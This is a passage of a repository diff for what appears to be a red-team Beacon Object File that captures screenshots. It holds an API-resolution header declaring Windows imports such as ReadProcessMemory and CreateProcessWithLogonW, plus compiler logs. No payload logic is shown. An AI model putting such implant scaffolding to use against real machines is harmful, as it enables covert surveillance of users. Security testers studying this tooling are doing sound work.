59	+	DECLSPEC_IMPORT BOOL WINAPI GDI32$DeleteDC(HDC hdc);
60	+	#define DeleteDC GDI32$DeleteDC
61	+
62	+	DECLSPEC_IMPORT int WINAPI User32$ReleaseDC(HWND hWnd, HDC hDC);
63	+	#define ReleaseDC User32$ReleaseDC
64	+
65	+	DECLSPEC_IMPORT HGDIOBJ WINAPI GDI32$DeleteObject(HGDIOBJ ho);
66	+	#define DeleteObject GDI32$DeleteObject
67	+
68	+
69	+
70	+	/* End of function resolutions for screenshot */
71	+
72	+	/* Resolve some functions for writing BMP to disk*/
73	+
74	+	DECLSPEC_IMPORT HDC WINAPI GDI32$CreateDCA(LPCSTR pwszDriver,
75	+	LPCSTR pwszDevice,
76	+	LPCSTR pszPort,
77	+	const DEVMODEA* pdm);
78	+	#define CreateDCA GDI32$CreateDCA
79	+
80	+	DECLSPEC_IMPORT int WINAPI GDI32$GetDeviceCaps(HDC hdc,
81	+	int index);
82	+	#define GetDeviceCaps GDI32$GetDeviceCaps
83	+
84	+	DECLSPEC_IMPORT int WINAPI GDI32$GetObjectA(HANDLE h,
85	+	int c,
86	+	LPVOID pv);
87	+	#define GetObjectA GDI32$GetObjectA
88	+	DECLSPEC_IMPORT HGLOBAL WINAPI KERNEL32$GlobalAlloc(
89	+	UINT uFlags,
90	+	SIZE_T dwBytes);
91	+	#define GlobalAlloc KERNEL32$GlobalAlloc
92	+
93	+	DECLSPEC_IMPORT WINBASEAPI LPVOID WINAPI KERNEL32$GlobalLock(HGLOBAL);
94	+	#define GlobalLock KERNEL32$GlobalLock
95	+
96	+	DECLSPEC_IMPORT WINGDIAPI HGDIOBJ WINAPI GDI32$GetStockObject(int);
97	+	#define GetStockObject GDI32$GetStockObject
98	+
99	+	DECLSPEC_IMPORT WINGDIAPI HPALETTE WINAPI GDI32$SelectPalette(HDC, HPALETTE, BOOL);
100	+	#define SelectPalette GDI32$SelectPalette
101	+
102	+	DECLSPEC_IMPORT WINGDIAPI UINT WINAPI GDI32$RealizePalette(HDC);
103	+	#define RealizePalette GDI32$RealizePalette
104	+
105	+	DECLSPEC_IMPORT WINGDIAPI int WINAPI GDI32$GetDIBits(HDC hdc,
106	+	HBITMAP hbm,
107	+	UINT start,
108	+	UINT cLines,
109	+	LPVOID lpvBits,
110	+	LPBITMAPINFO lpbmi,
111	+	UINT usage);
112	+	#define GetDIBits GDI32$GetDIBits
113	+
114	+	DECLSPEC_IMPORT WINBASEAPI BOOL WINAPI KERNEL32$GlobalUnlock(HGLOBAL);
115	+	#define GlobalUnlock KERNEL32$GlobalUnlock
116	+
117	+	DECLSPEC_IMPORT WINBASEAPI HGLOBAL WINAPI KERNEL32$GlobalFree(HGLOBAL);
118	+	#define GlobalFree KERNEL32$GlobalFree
119	+
120	+	DECLSPEC_IMPORT WINBASEAPI BOOL WINAPI KERNEL32$CloseHandle(HANDLE);
121	+	#define CloseHandle KERNEL32$CloseHandle
122	+
123	+
124	+
125	+
126	+	/* End of function resolutions for writing BMP to disk */
127	+
128	+
129	+	/* COM */
130	+	DECLSPEC_IMPORT HRESULT WINAPI OLE32$CLSIDFromString(LPCWSTR, LPCLSID);
131	+	DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoCreateInstance(REFCLSID rclsid, LPUNKNOWN pUnkOuter, DWORD dwClsContext, REFIID riid, LPVOID* ppv);
132	+	DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoInitializeEx(LPVOID, DWORD);
133	+	DECLSPEC_IMPORT VOID WINAPI OLE32$CoUninitialize();
134	+	DECLSPEC_IMPORT HRESULT WINAPI OLE32$IIDFromString(LPWSTR lpsz, LPIID lpiid);
135	+	DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoInitialize(LPVOID pvReserved);
136	+	DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoCreateInstanceEx(REFCLSID, IUnknown, DWORD, COSERVERINFO, DWORD, MULTI_QI*);
137	+	DECLSPEC_IMPORT BSTR WINAPI OleAut32$SysAllocString(const OLECHAR*);
138	+	DECLSPEC_IMPORT LPVOID WINAPI OLEAUT32$VariantInit(VARIANTARG* pvarg);
139	+	DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoInitializeSecurity(PSECURITY_DESCRIPTOR pSecDesc, LONG cAuthSvc, SOLE_AUTHENTICATION_SERVICE* asAuthSvc, void* pReserved1, DWORD dwAuthnLevel, DWORD dwImpLevel, void* pAuthList, DWORD dwCapabilities, void* pReserved3);
140	+
141	+	/* Registry */
142	+	DECLSPEC_IMPORT LSTATUS APIENTRY ADVAPI32$RegOpenKeyExA(HKEY hKey, LPCSTR lpSubKey, DWORD ulOptions, REGSAM samDesired, PHKEY phkResult);
143	+	DECLSPEC_IMPORT LSTATUS APIENTRY ADVAPI32$RegDeleteTreeA(HKEY hKey, LPCSTR lpSubKey);
144	+	DECLSPEC_IMPORT LSTATUS APIENTRY ADVAPI32$RegCreateKeyExA(HKEY hKey, LPCSTR lpSubKey, DWORD Reserved, LPSTR lpClass, DWORD dwOptions, REGSAM samDesired,
145	+	CONST LPSECURITY_ATTRIBUTES lpSecurityAttributes, PHKEY phkResult, LPDWORD lpdwDisposition);
146	+	DECLSPEC_IMPORT LSTATUS APIENTRY ADVAPI32$RegSetValueExA(HKEY hKey, LPCSTR lpValueName, DWORD Reserved, DWORD dwType,
147	+	CONST BYTE* lpData, DWORD cbData);
148	+
149	+
150	+	/* FileSystem */
151	+	DECLSPEC_IMPORT HANDLE WINAPI KERNEL32$CreateFileA(LPCSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile);
152	+	DECLSPEC_IMPORT DWORD WINAPI KERNEL32$SetFilePointer(HANDLE hFile, LONG lDistanceToMove, PLONG lpDistanceToMoveHigh, DWORD dwMoveMethod);
153	+	DECLSPEC_IMPORT BOOL WINAPI KERNEL32$SetFilePointerEx(HANDLE hFile, LARGE_INTEGER liDistanceToMove, PLARGE_INTEGER lpDistanceToMoveHigh, DWORD dwMoveMethod);
154	+	DECLSPEC_IMPORT BOOL WINAPI KERNEL32$WriteFile(HANDLE hFile, LPCVOID lpBuffer, DWORD nNumberOfBytesToWrite, LPDWORD lpNumberOfBytesWritten, LPOVERLAPPED lpOverlapped);
155	+	DECLSPEC_IMPORT BOOL WINAPI KERNEL32$GetFileSizeEx(HANDLE hFile, PLARGE_INTEGER lpFileSize);
156	+	DECLSPEC_IMPORT DWORD WINAPI VERSION$GetFileVersionInfoSizeW(LPCWSTR lptstrFilenamea, LPDWORD lpdwHandle);
157	+	DECLSPEC_IMPORT BOOL WINAPI VERSION$GetFileVersionInfoW(LPCWSTR lptstrFilename, DWORD dwHandle, DWORD dwLen, LPVOID lpData);
158	+	DECLSPEC_IMPORT BOOL WINAPI VERSION$VerQueryValueW(LPCVOID pBlock, LPCWSTR lpSubBlock, LPVOID* lplpBuffer, PUINT puLen);
159	+
160	+
161	+	/* Memory */
162	+	DECLSPEC_IMPORT LPVOID WINAPI KERNEL32$HeapAlloc(HANDLE hHeap, DWORD dwFlags, SIZE_T dwBytes);
163	+	DECLSPEC_IMPORT BOOL WINAPI KERNEL32$HeapFree(HANDLE, DWORD, PVOID);
164	+	DECLSPEC_IMPORT LPVOID WINAPI KERNEL32$HeapReAlloc(HANDLE hHeap, DWORD dwFlags, LPVOID lpMem, SIZE_T dwBytes);
165	+	DECLSPEC_IMPORT void* __cdecl MSVCRT$memcpy(LPVOID, LPVOID, size_t);
166	+	DECLSPEC_IMPORT void __cdecl MSVCRT$memset(void*, int, size_t);
167	+
168	+
169	+	/* Process */
170	+	DECLSPEC_IMPORT HANDLE WINAPI KERNEL32$OpenProcess(DWORD dwDesiredAccess, BOOL bInheritHandle, DWORD dwProcessId);
171	+	DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$CreateProcessWithLogonW(LPCWSTR lpUsername, LPCWSTR lpDomain, LPCWSTR lpPassword, DWORD dwLogonFlags, LPCWSTR lpApplicationName, LPWSTR lpCommandLine, DWORD dwCreationFlags, LPVOID lpEnvironment, LPCWSTR lpCurrentDirectory, LPSTARTUPINFOW lpStartupInfo, LPPROCESS_INFORMATION lpProcessInformation);
172	+	DECLSPEC_IMPORT HANDLE WINAPI KERNEL32$GetProcessHeap();
173	+	DECLSPEC_IMPORT SIZE_T WINAPI KERNEL32$VirtualQueryEx(HANDLE hProcess, LPCVOID lpAddress, PMEMORY_BASIC_INFORMATION lpBuffer, SIZE_T dwLength);
174	+	DECLSPEC_IMPORT DWORD WINAPI KERNEL32$GetProcessId(HANDLE Process);
175	+	DECLSPEC_IMPORT BOOL WINAPI KERNEL32$ReadProcessMemory(HANDLE hProcess, LPCVOID lpBaseAddress, LPVOID lpBuffer, SIZE_T nSize, SIZE_T* lpNumberOfBytesRead);
176	+	DECLSPEC_IMPORT VOID WINAPI KERNEL32$Sleep(DWORD dwMilliseconds);
177	+	DECLSPEC_IMPORT HANDLE WINAPI KERNEL32$GetCurrentProcess(VOID);
178	+	DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$LookupPrivilegeValueW(LPCWSTR lpSystemName, LPCWSTR lpName, PLUID lpLuid);
179	+	DECLSPEC_IMPORT DWORD WINAPI PSAPI$GetModuleFileNameExW(HANDLE hProcess, HMODULE hModule, LPWSTR lpFilename, DWORD nSize);
180	+
181	+
182	+	/* GetLast Error */
183	+	DECLSPEC_IMPORT DWORD WINAPI KERNEL32$GetLastError(VOID);
184	+
185	+
186	+	/* Directories */
187	+	DECLSPEC_IMPORT BOOL WINAPI KERNEL32$RemoveDirectoryA(LPCSTR);
188	+	DECLSPEC_IMPORT BOOL WINAPI KERNEL32$CreateDirectoryA(LPCSTR lpPathName, LPSECURITY_ATTRIBUTES lpSecurityAttributes);
189	+	DECLSPEC_IMPORT BOOL WINAPI KERNEL32$MoveFileA(LPCSTR lpExistingFileName, LPCSTR lpNewFileName);
190	+	DECLSPEC_IMPORT BOOL WINAPI SHLWAPI$PathIsDirectoryA(LPCSTR);
191	+	DECLSPEC_IMPORT BOOL WINAPI SHLWAPI$PathFileExistsA(LPCSTR pszPath);
192	+
193	+
194	+	/* strings */
195	+	DECLSPEC_IMPORT PSTR WINAPI SHLWAPI$StrChrA(PCSTR pszStart, WORD wMatch);
196	+	DECLSPEC_IMPORT LPSTR __cdecl MSVCRT$strchr(LPSTR, int);
197	+	DECLSPEC_IMPORT errno_t __cdecl MSVCRT$strcat_s(LPSTR, size_t, LPCSTR);
198	+	DECLSPEC_IMPORT errno_t __cdecl MSVCRT$strcpy_s(LPSTR, size_t, LPCSTR);
199	+	DECLSPEC_IMPORT errno_t __cdecl MSVCRT$strncpy_s(LPSTR, size_t, LPCSTR, size_t);
200	+	DECLSPEC_IMPORT int __cdecl MSVCRT$_snprintf(LPSTR, size_t, LPCSTR, ...);
201	+	DECLSPEC_IMPORT void WINAPI MSVCRT$sprintf(char*, char[], ...);
202	+	DECLSPEC_IMPORT int __cdecl MSVCRT$_vsnprintf(LPSTR, size_t, LPCSTR, va_list);
203	+	DECLSPEC_IMPORT size_t __cdecl MSVCRT$wcslen(LPCWSTR);
204	+	DECLSPEC_IMPORT int __cdecl MSVCRT$strcmp(const char* _Str1, const char* _Str2);
205	+	DECLSPEC_IMPORT LPSTR WINAPI Kernel32$lstrcpyA(LPSTR lpString1, LPCSTR lpString2);
206	+	DECLSPEC_IMPORT LPSTR WINAPI Kernel32$lstrcatA(LPSTR lpString1, LPCSTR lpString2);
207	+	DECLSPEC_IMPORT LPSTR WINAPI Kernel32$lstrcpynA(LPSTR lpString1, LPCSTR lpString2, int iMaxLength);
208	+	DECLSPEC_IMPORT int WINAPI KERNEL32$lstrlenW(LPCWSTR lpString);
209	+	DECLSPEC_IMPORT LPWSTR WINAPI KERNEL32$lstrcpyW(LPWSTR lpString1, LPCWSTR lpString2);
210	+
211	+
212	+	/* RPC */
213	+	DECLSPEC_IMPORT RPC_STATUS RPC_ENTRY Rpcrt4$RpcStringFreeA(RPC_CSTR* String);
214	+	DECLSPEC_IMPORT RPC_STATUS RPC_ENTRY Rpcrt4$UuidCreate(UUID* Uuid);
215	+	DECLSPEC_IMPORT RPC_STATUS RPC_ENTRY Rpcrt4$UuidToStringA(const UUID* Uuid, RPC_CSTR* StringUuid);
216	+
217	+
218	+	/* Random */
219	+	DECLSPEC_IMPORT void WINAPI MSVCRT$srand(int initial);
220	+	DECLSPEC_IMPORT int WINAPI MSVCRT$rand();
221	+
222	+
223	+	/* DateTime */
224	+	DECLSPEC_IMPORT time_t WINAPI MSVCRT$time(time_t* time);
225	+
226	+
227	+	/* SystemInfo */
228	+	DECLSPEC_IMPORT void WINAPI KERNEL32$GetSystemInfo(LPSYSTEM_INFO lpSystemInfo);
229	+	DECLSPEC_IMPORT BOOL WINAPI KERNEL32$IsProcessorFeaturePresent(DWORD ProcessorFeature);
230	+	DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$GetUserNameW(LPWSTR lpBuffer, LPDWORD pcbBuffer);
231	+
232	+
233	+
234	+
235	+
236	+
237	+	#ifdef __cplusplus
238	+	}
239	+	#endif
240	+
241	+
242	+	/* helper macros */
243	+
244	+	#define malloc(size) KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, size) /* trustedsec */
245	+	#define free(addr) KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, (LPVOID)addr) /* trustedsec */
246	+	#define ZeroMemory(address, size) memset(address, 0, size);
247	+
248	+
249	+	/* ----------------------------------- DEFINITIONS ------------------------------------------*/
250	+
251	+	/* COM */
252	+	#define CLSIDFromString OLE32$CLSIDFromString
253	+	#define CoCreateInstance OLE32$CoCreateInstance
254	+	#define CoInitializeEx OLE32$CoInitializeEx
255	+	#define CoUninitialize OLE32$CoUninitialize
256	+	#define IIDFromString OLE32$IIDFromString
257	+	#define CoInitialize OLE32$CoInitialize
258	+	#define CoCreateInstanceEx OLE32$CoCreateInstanceEx
259	+	#define SysAllocString OleAut32$SysAllocString
260	+	#define VariantInit OLEAUT32$VariantInit
261	+	#define CoInitialize OLE32$CoInitialize
262	+	#define CoInitializeSecurity OLE32$CoInitializeSecurity
263	+
264	+	/* memory */
265	+	#define HeapFree KERNEL32$HeapFree
266	+	#define HeapAlloc KERNEL32$HeapAlloc
267	+	#define HeapReAlloc KERNEL32$HeapReAlloc
268	+	#define memcpy MSVCRT$memcpy
269	+	#define memset MSVCRT$memset
270	+
271	+
272	+	/* process */
273	+	#define GetProcessHeap KERNEL32$GetProcessHeap
274	+	#define CreateProcessWithLogonW ADVAPI32$CreateProcessWithLogonW
275	+	#define OpenProcess KERNEL32$OpenProcess
276	+	#define VirtualQueryEx KERNEL32$VirtualQueryEx
277	+	#define GetProcessId KERNEL32$GetProcessId
278	+	#define ReadProcessMemory KERNEL32$ReadProcessMemory
279	+	#define GetCurrentProcess KERNEL32$GetCurrentProcess
280	+	#define Sleep KERNEL32$Sleep
281	+	#define LookupPrivilegeValueW ADVAPI32$LookupPrivilegeValueW
282	+	#define GetModuleFileNameExW PSAPI$GetModuleFileNameExW
283	+
284	+
285	+	/* debug */
286	+	#define EnumerateLoadedModulesW64 DBGHELP$EnumerateLoadedModulesW64
287	+	#define SymInitializeW DBGHELP$SymInitializeW
288	+	#define SymCleanup DBGHELP$SymCleanup
289	+
290	+
291	+	/* filesystem */
292	+	#define CreateFileA KERNEL32$CreateFileA
293	+	#define SetFilePointer KERNEL32$SetFilePointer
294	+	#define SetFilePointerEx KERNEL32$SetFilePointerEx
295	+	#define WriteFile KERNEL32$WriteFile
296	+	#define GetFileSizeEx KERNEL32$GetFileSizeEx
297	+	#define GetFileVersionInfoSizeW VERSION$GetFileVersionInfoSizeW
298	+	#define GetFileVersionInfoW VERSION$GetFileVersionInfoW
299	+	#define VerQueryValueW VERSION$VerQueryValueW
300	+
301	+	/* error */
302	+	#define GetLastError KERNEL32$GetLastError
303	+
304	+
305	+	/* registry */
306	+	#define RegOpenKeyExA ADVAPI32$RegOpenKeyExA
307	+	#define RegDeleteTreeA ADVAPI32$RegDeleteTreeA
308	+	#define RegCreateKeyExA ADVAPI32$RegCreateKeyExA
309	+	#define RegSetValueExA ADVAPI32$RegSetValueExA
310	+
311	+
312	+	/* directory */
313	+	#define RemoveDirectoryA KERNEL32$RemoveDirectoryA
314	+	#define CreateDirectoryA KERNEL32$CreateDirectoryA
315	+	#define MoveFileA KERNEL32$MoveFileA
316	+	#define PathIsDirectoryA SHLWAPI$PathIsDirectoryA
317	+	#define PathFileExistsA SHLWAPI$PathFileExistsA
318	+
319	+
320	+	/* strings */
321	+	#define strchr MSVCRT$strchr
322	+	#define strcat_s MSVCRT$strcat_s
323	+	#define strcpy_s MSVCRT$strcpy_s
324	+	#define strncpy_s MSVCRT$strncpy_s
325	+	#define snprintf MSVCRT$_snprintf /beacon can't find snprintf without the preceeding '_' /
326	+	#define wcslen MSVCRT$wcslen
327	+	#define vsnprintf MSVCRT$vsnprintf
328	+	#define lstrlenW KERNEL32$lstrlenW
329	+	#define lstrcpyW KERNEL32$lstrcpyW
330	+	#define strcmp MSVCRT$strcmp
331	+	#define lstrcpyA Kernel32$lstrcpyA
332	+	#define lstrcatA Kernel32$lstrcatA
333	+	#define lstrcpynA Kernel32$lstrcpynA
334	+	#define lstrlenW KERNEL32$lstrlenW
335	+	#define lstrcpyW KERNEL32$lstrcpyW
336	+	#define sprintf MSVCRT$sprintf
337	+
338	+
339	+	/* RPC */
340	+	#define RpcStringFreeA Rpcrt4$RpcStringFreeA
341	+	#define UuidCreate Rpcrt4$UuidCreate
342	+	#define UuidToStringA Rpcrt4$UuidToStringA
343	+
344	+
345	+	/* Random */
346	+	#define srand MSVCRT$srand
347	+	#define rand MSVCRT$rand
348	+
349	+
350	+	/* DateTime */
351	+	#define time MSVCRT$time
352	+
353	+
354	+	/* SystemInfo */
355	+	#define GetSystemInfo KERNEL32$GetSystemInfo
356	+	#define GetUserNameW ADVAPI32$GetUserNameW
357	+	#define IsProcessorFeaturePresent KERNEL32$IsProcessorFeaturePresent
358	+
359	+	#else
360	+
361	+	#endif
362	+

■ ■ ■ ■ ■ ■

ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOF.log

1	+	Microsoft (R) C/C++ Optimizing Compiler Version 19.27.29111 for x64
2	+	Copyright (C) Microsoft Corporation. All rights reserved.
3	+
4	+	cl /c /D BOF /GS- /Fo"intermediary\BOF\x64\\" /TP /c /Fo"intermediary\BOF\x64\source" Source.cpp
5	+	cl : Command line warning D9025: overriding '/Fointermediary\BOF\x64\' with '/Fointermediary\BOF\x64\source'
6	+
7	+	Source.cpp
8	+	C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(93): warning C4141: 'dllimport': used more than once
9	+	C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(96): warning C4141: 'dllimport': used more than once
10	+	C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(99): warning C4141: 'dllimport': used more than once
11	+	C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(102): warning C4141: 'dllimport': used more than once
12	+	C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(105): warning C4141: 'dllimport': used more than once
13	+	C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(114): warning C4141: 'dllimport': used more than once
14	+	C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(117): warning C4141: 'dllimport': used more than once
15	+	C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(120): warning C4141: 'dllimport': used more than once
16	+	C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(246): warning C4005: 'ZeroMemory': macro redefinition
17	+	C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\um\minwinbase.h(39): note: see previous definition of 'ZeroMemory'
18	+	C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\intermediary\BOF\x64\source.obj
19	+	1 File(s) copied
20	+	enumerating sections...
21	+	found debug section.. zeroing it...
22	+	closing stream...
23	+	done!
24	+

■ ■ ■ ■ ■ ■

ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOF.tlog/CL.command.1.tlog

1	+	^C:\USERS\ETHAN\DOWNLOADS\AVEXCEPTION\CODEX_ARSENAL\PUBLIC\SCREENSHOT_BOF\SCREENSHOTBOF\SCREENSHOTBOF\SOURCE.CPP
2	+	/c /D BOF /GS- /Fo"INTERMEDIARY\BOF\X64\\" /TP /c /Fo"intermediary\BOF\x64\source" C:\USERS\ETHAN\DOWNLOADS\AVEXCEPTION\CODEX_ARSENAL\PUBLIC\SCREENSHOT_BOF\SCREENSHOTBOF\SCREENSHOTBOF\SOURCE.CPP
3	+

■ ■ ■ ■ ■ ■

ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOF.tlog/CL.read.1.tlog

1	+	^C:\USERS\ETHAN\DOWNLOADS\AVEXCEPTION\CODEX_ARSENAL\PUBLIC\SCREENSHOT_BOF\SCREENSHOTBOF\SCREENSHOTBOF\SOURCE.CPP
2	+	C:\WINDOWS\GLOBALIZATION\SORTING\SORTDEFAULT.NLS
3	+	C:\PROGRAM FILES (X86)\MICROSOFT VISUAL STUDIO\2019\COMMUNITY\VC\TOOLS\MSVC\14.27.29110\BIN\HOSTX86\X64\1033\CLUI.DLL
4	+	C:\WINDOWS\SYSTEM32\TZRES.DLL
5	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\WINDOWS.H
6	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\SHARED\WINAPIFAMILY.H
7	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\SHARED\WINPACKAGEFAMILY.H
8	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\SHARED\SDKDDKVER.H
9	+	C:\PROGRAM FILES (X86)\MICROSOFT VISUAL STUDIO\2019\COMMUNITY\VC\TOOLS\MSVC\14.27.29110\INCLUDE\EXCPT.H
10	+	C:\PROGRAM FILES (X86)\MICROSOFT VISUAL STUDIO\2019\COMMUNITY\VC\TOOLS\MSVC\14.27.29110\INCLUDE\VCRUNTIME.H
11	+	C:\PROGRAM FILES (X86)\MICROSOFT VISUAL STUDIO\2019\COMMUNITY\VC\TOOLS\MSVC\14.27.29110\INCLUDE\SAL.H
12	+	C:\PROGRAM FILES (X86)\MICROSOFT VISUAL STUDIO\2019\COMMUNITY\VC\TOOLS\MSVC\14.27.29110\INCLUDE\CONCURRENCYSAL.H
13	+	C:\PROGRAM FILES (X86)\MICROSOFT VISUAL STUDIO\2019\COMMUNITY\VC\TOOLS\MSVC\14.27.29110\INCLUDE\VADEFS.H
14	+	C:\PROGRAM FILES (X86)\MICROSOFT VISUAL STUDIO\2019\COMMUNITY\VC\TOOLS\MSVC\14.27.29110\INCLUDE\STDARG.H
15	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\SHARED\WINDEF.H
16	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\SHARED\MINWINDEF.H
17	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\SHARED\SPECSTRINGS.H
18	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\SHARED\SPECSTRINGS_STRICT.H
19	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\SHARED\SPECSTRINGS_UNDEF.H
20	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\SHARED\DRIVERSPECS.H
21	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\SHARED\SDV_DRIVERSPECS.H
22	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\WINNT.H
23	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UCRT\CTYPE.H
24	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UCRT\CORECRT.H
25	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UCRT\CORECRT_WCTYPE.H
26	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\SHARED\KERNELSPECS.H
27	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\SHARED\BASETSD.H
28	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\SHARED\GUIDDEF.H
29	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UCRT\STRING.H
30	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UCRT\CORECRT_MEMORY.H
31	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UCRT\CORECRT_MEMCPY_S.H
32	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UCRT\ERRNO.H
33	+	C:\PROGRAM FILES (X86)\MICROSOFT VISUAL STUDIO\2019\COMMUNITY\VC\TOOLS\MSVC\14.27.29110\INCLUDE\VCRUNTIME_STRING.H
34	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UCRT\CORECRT_WSTRING.H
35	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\SHARED\PSHPACK4.H
36	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\SHARED\POPPACK.H
37	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\SHARED\PSHPACK2.H
38	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\SHARED\PSHPACK8.H
39	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\SHARED\PSHPACK1.H
40	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\SHARED\APISET.H
41	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\SHARED\KTMTYPES.H
42	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\WINBASE.H
43	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\SHARED\APISETCCONV.H
44	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\MINWINBASE.H
45	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\APIQUERY2.H
46	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\PROCESSENV.H
47	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\FILEAPIFROMAPP.H
48	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\FILEAPI.H
49	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\DEBUGAPI.H
50	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\UTILAPISET.H
51	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\HANDLEAPI.H
52	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\ERRHANDLINGAPI.H
53	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\FIBERSAPI.H
54	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\NAMEDPIPEAPI.H
55	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\PROFILEAPI.H
56	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\HEAPAPI.H
57	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\IOAPISET.H
58	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\SYNCHAPI.H
59	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\INTERLOCKEDAPI.H
60	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\PROCESSTHREADSAPI.H
